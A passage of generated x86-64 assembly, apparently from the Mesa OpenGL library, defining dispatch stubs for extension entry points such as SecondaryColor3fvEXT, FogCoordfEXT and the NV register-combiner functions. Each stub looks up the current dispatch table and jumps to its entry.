movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4688(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 4688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3fEXT), .-GL_PREFIX(SecondaryColor3fEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3fvEXT)
.type GL_PREFIX(SecondaryColor3fvEXT), @function
GL_PREFIX(SecondaryColor3fvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4696(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3fvEXT), .-GL_PREFIX(SecondaryColor3fvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3iEXT)
.type GL_PREFIX(SecondaryColor3iEXT), @function
GL_PREFIX(SecondaryColor3iEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3iEXT), .-GL_PREFIX(SecondaryColor3iEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3ivEXT)
.type GL_PREFIX(SecondaryColor3ivEXT), @function
GL_PREFIX(SecondaryColor3ivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4712(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3ivEXT), .-GL_PREFIX(SecondaryColor3ivEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3sEXT)
.type GL_PREFIX(SecondaryColor3sEXT), @function
GL_PREFIX(SecondaryColor3sEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3sEXT), .-GL_PREFIX(SecondaryColor3sEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3svEXT)
.type GL_PREFIX(SecondaryColor3svEXT), @function
GL_PREFIX(SecondaryColor3svEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4728(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3svEXT), .-GL_PREFIX(SecondaryColor3svEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3ubEXT)
.type GL_PREFIX(SecondaryColor3ubEXT), @function
GL_PREFIX(SecondaryColor3ubEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3ubEXT), .-GL_PREFIX(SecondaryColor3ubEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3ubvEXT)
.type GL_PREFIX(SecondaryColor3ubvEXT), @function
GL_PREFIX(SecondaryColor3ubvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4744(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3ubvEXT), .-GL_PREFIX(SecondaryColor3ubvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3uiEXT)
.type GL_PREFIX(SecondaryColor3uiEXT), @function
GL_PREFIX(SecondaryColor3uiEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4752(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3uiEXT), .-GL_PREFIX(SecondaryColor3uiEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3uivEXT)
.type GL_PREFIX(SecondaryColor3uivEXT), @function
GL_PREFIX(SecondaryColor3uivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4760(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3uivEXT), .-GL_PREFIX(SecondaryColor3uivEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3usEXT)
.type GL_PREFIX(SecondaryColor3usEXT), @function
GL_PREFIX(SecondaryColor3usEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4768(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3usEXT), .-GL_PREFIX(SecondaryColor3usEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColor3usvEXT)
.type GL_PREFIX(SecondaryColor3usvEXT), @function
GL_PREFIX(SecondaryColor3usvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4776(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColor3usvEXT), .-GL_PREFIX(SecondaryColor3usvEXT)
.p2align 4,,15
.globl GL_PREFIX(SecondaryColorPointerEXT)
.type GL_PREFIX(SecondaryColorPointerEXT), @function
GL_PREFIX(SecondaryColorPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4784(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SecondaryColorPointerEXT), .-GL_PREFIX(SecondaryColorPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(MultiDrawArraysEXT)
.type GL_PREFIX(MultiDrawArraysEXT), @function
GL_PREFIX(MultiDrawArraysEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4792(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiDrawArraysEXT), .-GL_PREFIX(MultiDrawArraysEXT)
.p2align 4,,15
.globl GL_PREFIX(MultiDrawElementsEXT)
.type GL_PREFIX(MultiDrawElementsEXT), @function
GL_PREFIX(MultiDrawElementsEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4800(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultiDrawElementsEXT), .-GL_PREFIX(MultiDrawElementsEXT)
.p2align 4,,15
.globl GL_PREFIX(FogCoordPointerEXT)
.type GL_PREFIX(FogCoordPointerEXT), @function
GL_PREFIX(FogCoordPointerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 4808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4808(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 4808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FogCoordPointerEXT), .-GL_PREFIX(FogCoordPointerEXT)
.p2align 4,,15
.globl GL_PREFIX(FogCoorddEXT)
.type GL_PREFIX(FogCoorddEXT), @function
GL_PREFIX(FogCoorddEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 4816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4816(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 4816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FogCoorddEXT), .-GL_PREFIX(FogCoorddEXT)
.p2align 4,,15
.globl GL_PREFIX(FogCoorddvEXT)
.type GL_PREFIX(FogCoorddvEXT), @function
GL_PREFIX(FogCoorddvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4824(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FogCoorddvEXT), .-GL_PREFIX(FogCoorddvEXT)
.p2align 4,,15
.globl GL_PREFIX(FogCoordfEXT)
.type GL_PREFIX(FogCoordfEXT), @function
GL_PREFIX(FogCoordfEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 4832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4832(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 4832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FogCoordfEXT), .-GL_PREFIX(FogCoordfEXT)
.p2align 4,,15
.globl GL_PREFIX(FogCoordfvEXT)
.type GL_PREFIX(FogCoordfvEXT), @function
GL_PREFIX(FogCoordfvEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4840(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FogCoordfvEXT), .-GL_PREFIX(FogCoordfvEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_606)
.type GL_PREFIX(_dispatch_stub_606), @function
HIDDEN(GL_PREFIX(_dispatch_stub_606))
GL_PREFIX(_dispatch_stub_606):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 4848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4848(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 4848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_606), .-GL_PREFIX(_dispatch_stub_606)
.p2align 4,,15
.globl GL_PREFIX(BlendFuncSeparateEXT)
.type GL_PREFIX(BlendFuncSeparateEXT), @function
GL_PREFIX(BlendFuncSeparateEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4856(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BlendFuncSeparateEXT), .-GL_PREFIX(BlendFuncSeparateEXT)
.p2align 4,,15
.globl GL_PREFIX(FlushVertexArrayRangeNV)
.type GL_PREFIX(FlushVertexArrayRangeNV), @function
GL_PREFIX(FlushVertexArrayRangeNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 4864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4864(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 4864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FlushVertexArrayRangeNV), .-GL_PREFIX(FlushVertexArrayRangeNV)
.p2align 4,,15
.globl GL_PREFIX(VertexArrayRangeNV)
.type GL_PREFIX(VertexArrayRangeNV), @function
GL_PREFIX(VertexArrayRangeNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4872(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexArrayRangeNV), .-GL_PREFIX(VertexArrayRangeNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerInputNV)
.type GL_PREFIX(CombinerInputNV), @function
GL_PREFIX(CombinerInputNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4880(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerInputNV), .-GL_PREFIX(CombinerInputNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerOutputNV)
.type GL_PREFIX(CombinerOutputNV), @function
GL_PREFIX(CombinerOutputNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerOutputNV), .-GL_PREFIX(CombinerOutputNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerParameterfNV)
.type GL_PREFIX(CombinerParameterfNV), @function
GL_PREFIX(CombinerParameterfNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4896(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 4896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerParameterfNV), .-GL_PREFIX(CombinerParameterfNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerParameterfvNV)
.type GL_PREFIX(CombinerParameterfvNV), @function
GL_PREFIX(CombinerParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4904(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerParameterfvNV), .-GL_PREFIX(CombinerParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerParameteriNV)
.type GL_PREFIX(CombinerParameteriNV), @function
GL_PREFIX(CombinerParameteriNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerParameteriNV), .-GL_PREFIX(CombinerParameteriNV)
.p2align 4,,15
.globl GL_PREFIX(CombinerParameterivNV)
.type GL_PREFIX(CombinerParameterivNV), @function
GL_PREFIX(CombinerParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 4920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4920(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 4920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CombinerParameterivNV), .-GL_PREFIX(CombinerParameterivNV)
.p2align 4,,15
.globl GL_PREFIX(FinalCombinerInputNV)
.type GL_PREFIX(FinalCombinerInputNV), @function
GL_PREFIX(FinalCombinerInputNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FinalCombinerInputNV), .-GL_PREFIX(FinalCombinerInputNV)
.p2align 4,,15
.globl GL_PREFIX(GetCombinerInputParameterfvNV)
.type GL_PREFIX(GetCombinerInputParameterfvNV), @function
GL_PREFIX(GetCombinerInputParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4936(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCombinerInputParameterfvNV), .-GL_PREFIX(GetCombinerInputParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(GetCombinerInputParameterivNV)
.type GL_PREFIX(GetCombinerInputParameterivNV), @function
GL_PREFIX(GetCombinerInputParameterivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 4944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 4944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 4944(%rax), %r11
